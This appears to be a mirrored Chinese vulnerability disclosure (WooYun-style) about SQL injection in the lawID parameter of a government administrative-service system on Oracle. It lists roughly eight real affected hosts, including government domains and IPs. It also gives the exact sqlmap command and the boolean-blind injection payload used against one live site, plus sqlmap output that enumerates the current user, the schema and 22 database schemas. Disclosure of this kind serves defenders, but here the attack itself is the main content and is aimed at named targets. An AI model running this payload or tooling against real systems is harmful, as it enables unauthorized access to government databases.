|某gov在用行政服务系统某处SQL注入(Oracle数据库)

某gov在用行政服务系统某处SQL注入(Oracle数据库)

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： RT ### 详细说明：其他注入点，如： [WooYun: 某大型政府服务系统Oracle注入(使用量大)](http://www.wooyun.org/bugs/wooyun-2014-085183) [WooYun: 某Gov行政中心系统Oracle注入漏洞(使用量大)](http://www.wooyun.org/bugs/wooyun-2014-086650) [WooYun: 某gov行政服务系统Oracle数据库搜索型POST注入](http://www.wooyun.org/bugs/wooyun-2015-0100544) 这处注入出在：lawquery.do?lawID=0006&method=queryDetailLaw lasID存在注入目前wooyun上还没人提交，如图搜索结果： [<img src="https://images.seebug.org/upload/201503/161233535b57fb0c6f380bb41cad9734df18afdc.png" alt="0315_2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/161233535b57fb0c6f380bb41cad9734df18afdc.png) 按照通用程序标准（案例+演示），部分案例如下： http://www.gxyq.cn/query/law/lawquery.do?lawID=0006&method=queryDetailLaw http://jc.dlxg.gov.cn/LawQuery.do?method=querylawinfobyid&type=0&lawid=890999 http://www.hidyw.com/query/law/lawquery.do?method=queryDetailLaw&lawID=FZSJ2006001 http://221.7.244.26/query/law/lawquery.do?lawID=0003&method=queryDetailLaw http://www.jzsxzxndzjcw.gov.cn/LawQuery.do?method=querylawinfobyid&lawid=889723 http://119.1.108.246/LawQuery.do?method=query&type=1&lawid=0001 http://www.shad.gov.cn/alc/lawQuery.do?method=query&lawid=0001 http://jc.dlxg.gov.cn/LawQuery.do?method=querylawinfobyid&type=2&lawid=890883 ... 暂时就先统计这么多。。。演示见漏洞证明 ### 漏洞证明：拿其中一个案例进行演示： http://www.gxyq.cn/query/law/lawquery.do?lawID=0006&method=queryDetailLaw 直接工具跑： [<img src="https://images.seebug.org/upload/201503/161251080218847a39a4a396be29936fad557a2f.png" alt="0315_1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/161251080218847a39a4a396be29936fad557a2f.png) [<img src="https://images.seebug.org/upload/201503/16125141bca1df63ee99b7c72375519c17cfa792.png" alt="0315_3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/16125141bca1df63ee99b7c72375519c17cfa792.png) 数据库： [<img src="https://images.seebug.org/upload/201503/1613045561d7b6d6b25fee2b1bfa2afb09acc193.png" alt="0315_4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1613045561d7b6d6b25fee2b1bfa2afb09acc193.png) ``` available databases [22]: [*] CTXSYS [*] DBSNMP [*] DMSYS [*] EXFSYS [*] HR [*] IX [*] MDSYS [*] OE [*] OLAPSYS [*] ORDSYS [*] OUTLN [*] PM [*] SCOTT [*] SH [*] SISS [*] SYS [*] SYSMAN [*] SYSTEM [*] WK_TEST [*] WKSYS [*] WMSYS [*] XDB ``` 当前用户： ``` current user: 'SISS' ``` 当前数据库： ``` current schema (equivalent to database on Oracle): 'SISS' ``` 其他数据不跑了。。。贴出sqlmap记录吧，以做验证： ``` sqlmap.py -u "http://www.gxyq.cn/query/law/lawquery.do?lawID= 0006&method=queryDetailLaw" -p lawID --thread 6 --dbs --is-dba --current-db --cu rrent-user sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program [*] starting at 12:54:05 [12:54:05] [INFO] resuming back-end DBMS 'oracle' [12:54:05] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: lawID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: lawID=0006' AND 2127=2127 AND 'YhDA'='YhDA&method=queryDetailLaw --- [12:54:06] [INFO] the back-end DBMS is Oracle web application technology: JSP back-end DBMS: Oracle [12:54:06] [INFO] fetching current user [12:54:06] [INFO] retrieving the length of query output [12:54:06] [INFO] retrieved: 4 [12:54:09] [INFO] retrieved: SISS current user: 'SISS' [12:54:09] [INFO] fetching current database [12:54:09] [INFO] retrieving the length of query output [12:54:09] [INFO] resumed: 4 [12:54:09] [INFO] resumed: SISS current schema (equivalent to database on Oracle): 'SISS' [12:54:09] [INFO] testing if current user is DBA current user is DBA: False [12:54:09] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes [12:54:09] [INFO] fetching database (schema) names [12:54:09] [INFO] fetching number of databases [12:54:09] [INFO] retrieving the length of query output [12:54:09] [INFO] retrieved: 2 [12:54:49] [INFO] retrieved: 22 [12:54:49] [INFO] retrieving the length of query output [12:54:49] [INFO] retrieved: 6 [12:55:11] [INFO] retrieved: CTXSYS [12:55:11] [INFO] retrieving the length of query output [12:55:11] [INFO] retrieved: 6 [12:55:34] [INFO] retrieved: DBSNMP [12:55:34] [INFO] retrieving the length of query output [12:55:34] [INFO] retrieved: 5 [12:55:57] [INFO] retrieved: DMSYS [12:55:57] [INFO] retrieving the length of query output [12:55:57] [INFO] retrieved: 6 [12:56:36] [INFO] retrieved: EXFSYS [12:56:36] [INFO] retrieving the length of query output [12:56:36] [INFO] retrieved: 2 [12:57:03] [INFO] retrieved: HR [12:57:03] [INFO] retrieving the length of query output [12:57:03] [INFO] retrieved: 2 [12:57:26] [INFO] retrieved: IX [12:57:26] [INFO] retrieving the length of query output [12:57:26] [INFO] retrieved: 5 [12:57:53] [INFO] retrieved: MDSYS [12:57:53] [INFO] retrieving the length of query output [12:57:53] [INFO] retrieved: 2 [12:58:23] [INFO] retrieved: OE [12:58:23] [INFO] retrieving the length of query output [12:58:23] [INFO] retrieved: 7 [12:59:16] [INFO] retrieved: OLAPSYS [12:59:16] [INFO] retrieving the length of query output [12:59:16] [INFO] retrieved: 6 [12:59:51] [INFO] retrieved: ORDSYS [12:59:51] [INFO] retrieving the length of query output [12:59:51] [INFO] retrieved: 5 [13:00:34] [INFO] retrieved: OUTLN [13:00:34] [INFO] retrieving the length of query output [13:00:34] [INFO] retrieved: 2 [13:01:22] [INFO] retrieved: PM [13:01:22] [INFO] retrieving the length of query output [13:01:22] [INFO] retrieved: 5 [13:01:48] [INFO] retrieved: SCOTT [13:01:48] [INFO] retrieving the length of query output [13:01:48] [INFO] retrieved: 2 [13:02:14] [INFO] retrieved: SH [13:02:14] [INFO] retrieving the length of query output [13:02:14] [INFO] retrieved: 4 [13:02:39] [INFO] retrieved: SISS [13:02:39] [INFO] retrieving the length of query output [13:02:39] [INFO] retrieved: 3 [13:03:08] [INFO] retrieved: SYS [13:03:08] [INFO] retrieving the length of query output [13:03:08] [INFO] retrieved: 6 [13:03:37] [INFO] retrieved: SYSMAN [13:03:37] [INFO] retrieving the length of query output [13:03:37] [INFO] retrieved: 6 [13:03:56] [INFO] retrieved: SYSTEM [13:03:56] [INFO] retrieving the length of query output [13:03:56] [INFO] retrieved: 5 [13:04:46] [INFO] retrieved: WKSYS [13:04:46] [INFO] retrieving the length of query output [13:04:46] [INFO] retrieved: 7 [13:05:46] [INFO] retrieved: WK_TEST [13:05:46] [INFO] retrieving the length of query output [13:05:46] [INFO] retrieved: 5 [13:06:07] [INFO] retrieved: WMSYS [13:06:07] [INFO] retrieving the length of query output [13:06:07] [INFO] retrieved: 3 [13:06:27] [INFO] retrieved: XDB available databases [22]: [*] CTXSYS [*] DBSNMP [*] DMSYS [*] EXFSYS [*] HR [*] IX [*] MDSYS [*] OE [*] OLAPSYS [*] ORDSYS [*] OUTLN [*] PM [*] SCOTT [*] SH [*] SISS [*] SYS [*] SYSMAN [*] SYSTEM [*] WK_TEST [*] WKSYS [*] WMSYS [*] XDB [13:06:27] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou tput\www.gxyq.cn' [*] shutting down at 13:06:27 ```

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™